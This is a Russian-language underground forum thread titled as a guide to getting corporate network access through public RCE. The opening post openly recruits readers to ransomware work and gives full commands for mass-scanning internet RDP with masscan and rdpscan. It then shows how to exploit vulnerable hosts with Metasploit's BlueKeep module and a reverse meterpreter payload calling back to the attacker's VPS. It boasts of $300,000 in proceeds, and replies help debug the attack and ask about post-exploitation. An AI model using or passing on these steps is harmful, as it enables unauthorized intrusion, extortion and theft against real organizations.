Статья Добываем доступы в корпы через паблик RCE

[boriselcin]

Как заработать от 1к до 100к баксов за месяц почти без вложений?

Привет коммуннити! Сегодня я расскажу вам как стать рансомварщиками, практически без вложений.
Мы будем добывать точки входа в мелкие и средние компании, при помощи metasploit при этом вложив 100 баксов в покупку лишь 2 х vps
Что нужно:
2 vps сервера на Ubuntu (желательно абузоустойчивые топовая конфигурация будет не нужна поэтому 100 баксов вам должно хватить)
PS вы можете взять любую другую OS я буду описывать настройку именно на убунту

Intro первоначальная настройка впс для работы с метой
У нас есть чистая ubuntu
нактим xrdp + xfce оболочку (мне так удобней вы можете взамидействоать с сервером п ssh)

Обновим пакеты
sudo apt-get update

Накатим xrdp для работы через терминальные сессии

sudo apt-get install xrdp

Установим облочку xfce можно поставить mate например (но стабильней всего с терминальным серверовм работает именно xfce)

sudo apt-get install xfce4 xfce4-terminal

Разрешим xrdp исользовать эту оболчку

sudo sed -i.bak '/fi/a #xrdp multiple users configuration n xfce-session n' /etc/xrdp/startwm.sh

Включаем xrpd

Сорян ошибки граматики пунктуации и синтаксиса писал на колонке ничего не редактируя, если кто то захочет дополнить или записать видео по этой теме закину 50-100 баксов для мотивации)


sudo systemctl enable xrdp


Done теперь вы можете работать с сервером через терминальную сессию


поставим удобный текстовый редактор gedit

sudo apt-get install gedit


Поставим htop для мониторинга загруженности системы

sudo apt-get install htop


Установка metasploit, БД к нему подтягивать не будем она не понадобиться


качаем метасплойт курлом или wget
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

даем права chmod 755 msfinstall

sudo ./msfinstall


Теперь при наборе msfconsole в шелле метасплойт запуститься.

II выбор RCE и подготовка материала

Добывать свой хлеб мы будем данной уязвимостью

xttps://en.wikipedia.org/wiki/BlueKeep

в метасплойте есть rce для него

exploit/windows/rdp/cve_2019_0708_bluekeep_rce


Данное rce для протокола rdp оно крайне не стабильно, но приносит хорошие доступы)

С RCE мы определились

теперь нам нужен материал, то есть уязвимые машины в клирнете под блюкип

В идеале если у вас будут подсети с maxmaind и софт для пентеста от z668, он нужен исключительно для чека на RDP сервис дабы не тратить время и пропускать порты все что не относиться к рдп

лучше всего сканировать рандомные TCP порты и потом проверять их на сервис рдп

Я покажу на примере стандандартного 3389 порта


Установим еще 2 софта для сканирования портов (masscan) и rdpscan для проверку на узвимый bluekeep

ставим все не обходимое для работы масскана sudo apt-get install git gcc make libpcap-dev
затягиваем сорсы к себе git clone https://github.com/robertdavidgraham/masscan
переходим в каталог с массканом cd masscan
собираем в многопотоке make -j

Качаем бесплатно либо покупаем депы IP адресов


masscan -iL ip.txt -oL res4.txt -p 3389 --rate 100000 --exclude 255.255.255.255
данные параметры возьмут депы из фаила res4.txt просканируют порт 3389 с рейтом 100 000 исключая 255.255.255.255 подсеть

awk '{ print $4,$3 }' OFS=":" res4.txt > 4433.txt

выдаст чистые результаты IP с output фаила масскана


Ставим сканер на уязвимость блюкип и все необходимо для его работы

sudo apt-get install libssl-dev sudo apt-get install build-essential

git clone https://github.com/robertdavidgraham/rdpscan.git
cd /rdpscan/
компилируем make -j

Запуск сканера

./rdpscan --workers 500 --port 3389 --file /root/rdpscan/ch2.txt grep 'VULN' | cut -f1 -d'-' >results.txt

--workers 500 (количество воркеров стоит отписальное количество зависит от вашей конфигурации сервера )

--port 3389 порт который сканируем

--file /root/rdpscan/ch2.txt путь до фаила с ипами

grep 'VULN' выбираем только уязвимые и записываем в фаил >results.txt

III получаем доступы

Я буду использовать стандартный пейлоад метасплойта для закрепления, можно ипользовать кобальт страйк или любую другую систему пост эксплуатации но статья расчитана на тех у кого нет нихуя даже кряка, будем использовать метерперетер


и так запускаем метасплойт

msfconsole


И сразу открываем второе окно терминала и там опять запускаем метасплойт


В первом окне делаем handler (туда будут лететь сессии отдельным окном)

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp_rc4 (выбираем пелоад реверс (когда цель подключаеться к нам) с шифрованием )
set EXITFUNC thread
EXITFUNC есть 3 разных значения: thread, process, seh
мы используем thread он используеться почти везде и работает достаточно хорошо
запускает шелл-код в подпотоке, и выход из этого потока приводит к рабочему приложению / системе.

set LHOST хост нашей впс
set LPORT порт где будет висит слушатель
set RC4PASSWORD PASSS ( пароль для RC4)
set ExitOnSession 0 (данный параметр будет держать сессию всегда онлайн (тоесть не будет слипа может привести к быстрому спаливанию))
setg SessionLogging y включить логирование
setg loglevel 1 уровень логирования
run -j запуск

хэндлер готов и ожидает коннектов

переходим во второе окно
Bluekeep
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set payload windows/x64/meterpreter/reverse_tcp_rc4
set EXITFUNC thread
set DisablePayloadHandler 1 (обязтаельно 1 что бы сесия летела в отдельное окно)
set LHOST ип впс
set LPORT порт (указывать такой же как и в хэндлере)
set RC4PASSWORD PASSS (пароль такой же как в хэндлере)
set ConnectTimeout 5 (таймаут)
set GROOMSIZE 100 (количество мегабайт которыми будет заспамливаться хост играйтесь с парметрами от 100 до 250 ) всегда будут прилетать разные машины
set GROOMCHANNELCOUNT 1
set forceexploit 1 исполнять принудетельно
set target 1 (дефолтный таргет тут менять ничего не нужно )
set rhosts file:/root/rdpscan/4.txt (путь до фаила с уязмимыми машинами)
set RPORT (если вы используете не старндартый порт для RDP если 3389 то его можно не указывать он стоит по дефолту)
run - запуск

через какое то время в хендлер полетят сесии


Computer : V-RDS-01 OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_GB Domain : BROWNHILLS Logged On Users : 41 Meterpreter : x64/windows

Вам остается только закрепляться и отбирать доступы)

Enjoy

c Апреля по по Июль я заработал блюкипом около 300.000 USD чистыми деньгами, таким способом можно поймать
компании с ревеню до 100 миллонов,
тем самым поучиться пентесту не покупая мат, в этой теме вы можете задавать вопросы

 

[QabrielAlex]

После получения доступа что именно ищите?

 

[pinakoladaboy]

set rhosts file:/root/rdpscan/4.txt (путь до фаила с уязмимыми машинами) у меня фаил не хавает пробовал и .txt и .csv file:///.txt:3389 - Exploit failed: One or more options failed to validate: RHOSTS. А если 1 айпи в ручную прописывать то все ок

 

[boriselcin]

ты прописывай не столбиком айпи. а. в строку
пример 192.168.2.2 192.87.33.22 199.22.33.44 главное без запятых и в строку с 1 пробелом

 

[pinakoladaboy]

понял спасибо

 

[pinakoladaboy]

ты прописывай не столбиком айпи. а. в строку
пример 192.168.2.2 192.87.33.22 199.22.33.44 главное без запятых и в строку с 1 пробелом

непомогло

 

[p2d]

непомогло

ip, ip, ip - я таким образом пишу в RHOSTS

 

[xeiW9ch]

Получили шел, самое интересное что дальше? Закрепляться и отбирать доступы - каким образом? Про пост эксплуатацию никто не пишет.

 

[RootExploit]

Got it going, the fun part is what's next? How to secure and select access? Nobody writes about the post operation.

POST-EXPLOITATION docs can be found on metasploit website.

 

[Desoxyn]

Пост-эксплуатация это очень обширная и масштабная тема, ее не охватить целиком в рамках одной статьи, т.к. и двух одинаковых конфигов не бывает и пару команд в мету - это тоже как статью (у меня лично) рассматривать не получается )))) Однако тс канешн + за старания.

 

[pinakoladaboy]

ip, ip, ip - я таким образом пишу в RHOSTS

мне помогло в ручную если в RHOSTS прописывать ip ip ip без запятых

 

[JokeForYou]

Разобрался, инструкция вполне понятна, буду ждать результата.

 

[What So Not]

в покупку лишь 2 х vps

А для чего 2 VPS?

 

[National Hazard Agency]

кому нужны все адреса в мире на порте 3389 https://opendata.rapid7.com/sonar.tcp/ найдете их тут там еще и другие порты есть кста сервис довольно полезный

 

[boriselcin]

А для чего 2 VPS?

один под масскан 1 под блюкип, сервер с массканом лучше после каждого скана - менять

 

[md2020]

один под масскан 1 под блюкип, сервер с массканом лучше после каждого скана - менять

через тор нельзя массканить?

 

[What So Not]

один под масскан 1 под блюкип, сервер с массканом лучше после каждого скана - менять

тогда тут уже вложения присутствуют)

 

[bezdomny]

Борис, ответь пожалуйста в ЛС

 

[xeiW9ch]

Пост-эксплуатация это очень обширная и масштабная тема

Какие в целом скиллы нужны сети, виндовый шел (power shell), т.е. знания win админа? Доку пока не смотрел, что RootExploit посоветовал.

 

[xeiW9ch]

И почему именно нужны "абузоустойчивые" сервера? Прокладки не подойдут в данном случае? (имею ввиду прокидывать трафик на метасплойт через другие хосты).